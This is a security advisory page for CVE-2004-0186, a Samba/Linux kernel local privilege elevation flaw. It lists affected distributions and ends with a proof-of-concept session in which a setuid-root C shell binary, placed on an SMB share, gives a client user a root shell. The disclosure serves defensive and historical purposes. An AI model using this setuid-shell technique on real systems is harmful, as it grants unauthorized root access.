exploits , vulnerabilities , articles , Linux Kernel Samba Share Local Privilege Elevation Vulnerability
| Title |
Linux Kernel Samba Share Local Privilege Elevation Vulnerability |
| Published |
2004-02-09-12:00AM |
| Updated |
2004-09-15-07:09PM |
| Class |
Access Validation Error |
| CVE |
CAN-2004-0186 CVE-2004-0186 |
| Remote |
No |
| Local |
Yes |
| Credit |
Discovery of this vulnerability has been credited to Martin Fiala <digri@dik.cvut.cz> |
| Vulnerable |
Samba Samba 2.2.8 a
MandrakeSoft Linux Mandrake 9.2
MandrakeSoft Linux Mandrake 9.2 amd64
S.u.S.E. Linux 8.1
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.1
Samba Samba 2.2.7 a
MandrakeSoft Corporate Server 2.1
MandrakeSoft Corporate Server 2.1 x86_64
MandrakeSoft Linux Mandrake 8.0
MandrakeSoft Linux Mandrake 8.0 ppc
MandrakeSoft Linux Mandrake 8.1
MandrakeSoft Linux Mandrake 8.1 ia64
MandrakeSoft Linux Mandrake 8.2
MandrakeSoft Linux Mandrake 8.2 ppc
MandrakeSoft Linux Mandrake 9.0
MandrakeSoft Linux Mandrake 9.1
MandrakeSoft Linux Mandrake 9.1 ppc
MandrakeSoft Multi Network Firewall 2.0
OpenPKG OpenPKG 1.2
RedHat Linux 9.0 i386
S.u.S.E. Linux Personal 8.2
Slackware Linux 8.1
Turbolinux Appliance Server Hosting Edition 1.0
Turbolinux Appliance Server Workgroup Edition 1.0
Turbolinux Home
Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux Server 7.0
Turbolinux Turbolinux Server 8.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Workstation 8.0
Samba Samba 2.2.3 a
Conectiva Linux 8.0
Debian Linux 3.0
Debian Linux 3.0 alpha
Debian Linux 3.0 arm
Debian Linux 3.0 hppa
Debian Linux 3.0 ia32
Debian Linux 3.0 ia64
Debian Linux 3.0 m68k
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 sparc
MandrakeSoft Linux Mandrake 8.2
MandrakeSoft Linux Mandrake 8.2 ppc
RedHat Linux 7.3
RedHat Linux 7.3 i386
RedHat Linux 7.3 i686
S.u.S.E. Linux 8.0
S.u.S.E. Linux 8.0 i386
Samba Samba 2.2.3 a
Conectiva Linux 8.0
Debian Linux 3.0
Debian Linux 3.0 alpha
Debian Linux 3.0 arm
Debian Linux 3.0 hppa
Debian Linux 3.0 ia32
Debian Linux 3.0 ia64
Debian Linux 3.0 m68k
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 sparc
S.u.S.E. Linux 8.0
Linux kernel 2.6.1 rc2
Linux kernel 2.6.1 rc1
Linux kernel 2.6 test9CVS
Linux kernel 2.6 test9
Linux kernel 2.6 test8
Linux kernel 2.6 test7
Linux kernel 2.6 test6
Linux kernel 2.6 test5
Linux kernel 2.6 test4
Linux kernel 2.6 test3
Linux kernel 2.6 test2
Linux kernel 2.6 test11
Linux kernel 2.6 test10
Linux kernel 2.6 test1
Linux kernel 2.6
Gentoo Linux 1.4 _rc3
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
Gentoo Linux 1.4 |
| Not Vulnerable |
|
| Code |
The following example has been supplied:
"share" - smb server
"slovakia" - smb client
misko@slovakia:~$ smbmount --version
Usage: mount.smbfs service mountpoint [-n] [-o options,...]
Version 3.0.1-Debian
misko@slovakia:~$ ls -l /usr/bin/smbmount
- - -rwxr-xr-x 1 root root 591756 2004-01-13 20:29 /usr/bin/smbmount
misko@slovakia:~$ ls -l /usr/bin/smbmnt
- - -rwsr-sr-x 1 root root 8088 2004-01-13 20:29 /usr/bin/smbmnt
^
Confirmed to be default on Debian and Mandrake.
share:/data/share# cat a.c
main()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
share:/data/share# make a
cc a.c -o a
share:/data/share# chmod +s a
share:/data/share#
share:/etc/samba/smb.conf
[share]
path = /data/share
writable = no
locking = no
public = yes
guest ok = yes
comment = Share
share:/data/share# ls -l a
- - -rwsr-sr-x 1 root root 11716 Feb 8 12:39 a
misko@slovakia:~$ ls -l pokus/a
- - -rwsr-sr-x 1 root root 11716 2004-02-08 12:39 pokus/a
misko@slovakia:~$ pokus/a
root@slovakia:~# id
uid=0(root) gid=0(root) skupiny=1000(misko),0(root),29(audio),100(users),1034(mtr),1035(333)
root@slovakia:~#
|
| TXT |
 |
|
Advertising
|
